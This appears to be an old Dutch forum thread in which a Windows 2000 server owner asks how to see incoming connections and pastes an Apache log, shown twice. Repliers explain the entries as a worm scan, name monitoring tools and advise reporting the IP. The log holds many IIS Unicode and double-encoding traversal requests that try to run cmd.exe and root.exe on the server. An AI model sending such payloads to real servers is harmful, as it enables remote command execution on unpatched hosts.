Toon posts:

[Windows 2000 server] Alle inkomende connecties laten zien

Pagina: 1
Acties:

Verwijderd

Topicstarter
Is er een mogelijkheid om alle inkomende connecties te 'loggen' of te laten zien op het scherm? Ik bedoel dus ALLE computers die (vanaf internet) een verbinding leggen met mijn server. Of dit nu dmv. m'n apache of ftp is, dat maakt niet uit.

  • holoX
  • Registratie: December 2001
  • Laatst online: 19:52
netstat /?

  • blackd
  • Registratie: Februari 2001
  • Niet online
Wat dacht u van de ingebouwde logfuncties van Apache, FTP server etc.?

9000Wp o/w SolarEdge SE6K - Panasonic 5kW bi-bloc - gasloos sinds 17-7-2023


Verwijderd

Topicstarter
blackd schreef op 03 February 2003 @ 19:21:
Wat dacht u van de ingebouwde logfuncties van Apache, FTP server etc.?
Ja, die ken ik, maar bestaat er geen programmaatje die mij realtime de openstaande verbindingen laten zien? Die log-files ken ik wel...

Verwijderd

Topicstarter
Ik krijg namelijk de volgende regels te zien in m'n apache-log:

code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
216.177.25.76 - - [03/Feb/2003:02:47:28 +0100] "GET / HTTP/1.1" 200 134
213.51.77.246 - - [03/Feb/2003:03:44:46 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 295
213.51.77.246 - - [03/Feb/2003:03:44:48 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 293
213.51.77.246 - - [03/Feb/2003:03:44:49 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
213.51.77.246 - - [03/Feb/2003:03:44:51 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
213.51.77.246 - - [03/Feb/2003:03:44:53 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
213.51.77.246 - - [03/Feb/2003:03:44:55 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334
213.51.77.246 - - [03/Feb/2003:03:44:57 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334
213.51.77.246 - - [03/Feb/2003:03:44:59 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350
213.51.77.246 - - [03/Feb/2003:03:45:01 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316
213.51.77.246 - - [03/Feb/2003:03:45:03 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316
213.51.77.246 - - [03/Feb/2003:03:45:05 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316
213.51.77.246 - - [03/Feb/2003:03:45:07 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316
213.51.77.246 - - [03/Feb/2003:03:45:08 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 300
213.51.77.246 - - [03/Feb/2003:03:45:10 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 300
213.51.77.246 - - [03/Feb/2003:03:45:12 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
213.51.77.246 - - [03/Feb/2003:03:45:13 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
213.51.77.246 - - [03/Feb/2003:05:12:10 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 295
213.51.77.246 - - [03/Feb/2003:05:12:11 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 293
213.51.77.246 - - [03/Feb/2003:05:12:12 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
213.51.77.246 - - [03/Feb/2003:05:12:13 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
213.51.77.246 - - [03/Feb/2003:05:12:15 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
213.51.77.246 - - [03/Feb/2003:05:12:16 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334
213.51.77.246 - - [03/Feb/2003:05:12:17 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334
213.51.77.246 - - [03/Feb/2003:05:12:19 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350


(sorry voor de layout).
Wat is dit? Wie is dit? En wat doet hij/zij?

  • blackd
  • Registratie: Februari 2001
  • Niet online
Klik.

9000Wp o/w SolarEdge SE6K - Panasonic 5kW bi-bloc - gasloos sinds 17-7-2023


Verwijderd

tcpdump

  • F_J_K
  • Registratie: Juni 2001
  • Niet online

F_J_K

Moderator CSA/PB

Front verplichte underscores

Zie [rml]blackd in "[ Windows 2000 server] Alle inkomende con"[/rml] - een of andere worm probeert toegang te krijgen tot je systeem. Wat niet lukt, dus er is weinig aan de hand :)

Zie ook klik: en dus bijv. Wat zijn dit voor logs?

Maar je 'echte' vraag is dus of het kwaad kan / wat het doet?

'Multiple exclamation marks,' he went on, shaking his head, 'are a sure sign of a diseased mind' (Terry Pratchett, Eric)


Verwijderd

Topicstarter
Nou, ik zou dus graag een programmaatje op de desktop zetten dat mij precies vertelt wat de openstaande verbindingen zijn.

  • alt-92
  • Registratie: Maart 2000
  • Niet online

alt-92

ye olde farte

Verwijderd schreef op 03 februari 2003 @ 20:16:
Nou, ik zou dus graag een programmaatje op de desktop zetten dat mij precies vertelt wat de openstaande verbindingen zijn.
kent apache's log onder windows geen tail optie?

ik heb een 864 GB floppydrive! - certified prutser - the social skills of a thermonuclear device


Verwijderd

Topicstarter
BackSlash32 schreef op 03 februari 2003 @ 23:44:
[...]

kent apache's log onder windows geen tail optie?
Hmm.. wat is een 'tail'-optie?

Verwijderd

Verwijderd schreef op 03 February 2003 @ 19:29:
Ik krijg namelijk de volgende regels te zien in m'n apache-log:

code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
216.177.25.76 - - [03/Feb/2003:02:47:28 +0100] "GET / HTTP/1.1" 200 134
213.51.77.246 - - [03/Feb/2003:03:44:46 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 295
213.51.77.246 - - [03/Feb/2003:03:44:48 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 293
213.51.77.246 - - [03/Feb/2003:03:44:49 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
213.51.77.246 - - [03/Feb/2003:03:44:51 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
213.51.77.246 - - [03/Feb/2003:03:44:53 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
213.51.77.246 - - [03/Feb/2003:03:44:55 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334
213.51.77.246 - - [03/Feb/2003:03:44:57 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334
213.51.77.246 - - [03/Feb/2003:03:44:59 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350
213.51.77.246 - - [03/Feb/2003:03:45:01 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316
213.51.77.246 - - [03/Feb/2003:03:45:03 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316
213.51.77.246 - - [03/Feb/2003:03:45:05 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316
213.51.77.246 - - [03/Feb/2003:03:45:07 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316
213.51.77.246 - - [03/Feb/2003:03:45:08 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 300
213.51.77.246 - - [03/Feb/2003:03:45:10 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 300
213.51.77.246 - - [03/Feb/2003:03:45:12 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
213.51.77.246 - - [03/Feb/2003:03:45:13 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
213.51.77.246 - - [03/Feb/2003:05:12:10 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 295
213.51.77.246 - - [03/Feb/2003:05:12:11 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 293
213.51.77.246 - - [03/Feb/2003:05:12:12 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
213.51.77.246 - - [03/Feb/2003:05:12:13 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
213.51.77.246 - - [03/Feb/2003:05:12:15 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
213.51.77.246 - - [03/Feb/2003:05:12:16 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334
213.51.77.246 - - [03/Feb/2003:05:12:17 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334
213.51.77.246 - - [03/Feb/2003:05:12:19 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350


(sorry voor de layout).
Wat is dit? Wie is dit? En wat doet hij/zij?
Dit zie ik ook heel vaak in mijn IIS logs. Iemand die probeert m'n C: directory op te vragen. Schrijf IP op en geef dit met de logfile aan je provider. Heb ik eens gedaan en die persoon nooit meer gezien. IP bestond paar weken later niet eens meer :)

  • Stormtrooper
  • Registratie: December 2001
  • Laatst online: 20:58

Stormtrooper

Stormtroopers Of Death

Verwijderd schreef op 03 February 2003 @ 23:48:
[...]

Hmm.. wat is een 'tail'-optie?
Tail is een Unix tool waarmee je bijvoorbeeld de laatste regles van een log constant op je scherm kunt krijgen.... Heel handig.....En die is er wel voor Windows, zoek maar eens met google o.i.d. op "tail for windows"....

Probleem is denk ik eerder (ik weet niet in hoeverre dat ook voor Apache for Windows geld) dat veel van die logs gecached worden en slecht eens in de zoveel tijd weggeschreven. Tail heeft dan denk ik niet echt veel nut......

[ Voor 38% gewijzigd door Stormtrooper op 04-02-2003 11:45 . Reden: aanvulling ]

Stormtroopers toys: Asus Strix 16, Samsung S24 Ultra, HP Z4 G4.


Verwijderd

Verwijderd schreef op 03 February 2003 @ 20:16:
Nou, ik zou dus graag een programmaatje op de desktop zetten dat mij precies vertelt wat de openstaande verbindingen zijn.
Wat jij zoekt is: Active Ports
Download hier: http://www.protect-me.com/freeware.html

Verwijderd

Topicstarter
Super! Dit bedoelde ik precies! Dankje en echt een ideaal programmaatje!

  • Hollanda
  • Registratie: Maart 2004
  • Laatst online: 25-09-2025
Ik gebruik hier TCPview voor.

  • Spider.007
  • Registratie: December 2000
  • Niet online

Spider.007

* Tetragrammaton

Je schopt dan ook een topic van 2 jaar oud; dus mogelijk bestond die applicatie toen nog niet ;) Verder ben ik bang dat de topicstarter niet zoveel meer aan je tip heeft ;)

---
Prozium - The great nepenthe. Opiate of our masses. Glue of our great society. Salve and salvation, it has delivered us from pathos, from sorrow, the deepest chasms of melancholy and hate


  • alt-92
  • Registratie: Maart 2000
  • Niet online

alt-92

ye olde farte

Ik heb tcpview binaries van 2001 liggen dus het bestond toen al ;)

ik heb een 864 GB floppydrive! - certified prutser - the social skills of a thermonuclear device


  • Clueless
  • Registratie: Juli 2001
  • Laatst online: 20-02 11:02
Die regels zijn om IIS te exploiten waardoor men toegang kan krijgen tot je server en uiteindelijk em kunnen hacken op een of andere manier. Ze maken hierbij gebruik van IIS Unicode-exploits, maar ik kan je gerust stellen dat als je geen IIS draait of in ieder geval zorgt dat als je wel IIS draait dat je je boel gepatcht en goed geconfigureerd hebt er helemaal niets aan de hand is. Die regels worden hoogst waarschijnlijk gegenereerd door een of andere scantool.

Jouw oplossing werkt dus ook: IIS uitzetten en Apache gebruiken :P

Don't worry dus en stuur het IP inderdaad naar de betreffende provider met de melding dat het betreffende IP hacking-attempts op je server aan het doen was.

Edit:
IIS tip: IIS Lockdown
http://www.microsoft.com/...urity/tools/locktool.mspx

[ Voor 7% gewijzigd door Clueless op 19-12-2005 00:34 ]

I Don't Know, So Don't Shoot Me


  • alt-92
  • Registratie: Maart 2000
  • Niet online

alt-92

ye olde farte

Voordat je reageert wil het nog wel eens schelen naar de datum te kijken.

Dat voorkomt dat je met oplossingen komt voor een probleem wat na dik 2 jaar waarschijnlijk niet eens meer aan de orde is ;)

ik heb een 864 GB floppydrive! - certified prutser - the social skills of a thermonuclear device

Pagina: 1